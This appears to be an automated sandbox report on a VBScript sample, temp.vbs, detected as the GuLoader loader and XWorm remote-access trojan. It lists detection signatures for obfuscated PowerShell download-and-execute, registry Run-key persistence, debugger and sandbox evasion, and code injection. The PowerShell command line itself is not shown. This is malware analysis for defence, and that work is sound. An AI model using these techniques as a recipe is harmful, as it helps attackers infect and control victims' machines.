Windows
Analysis Report
temp.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2620, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 4788, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script, garbled by extraction and truncated])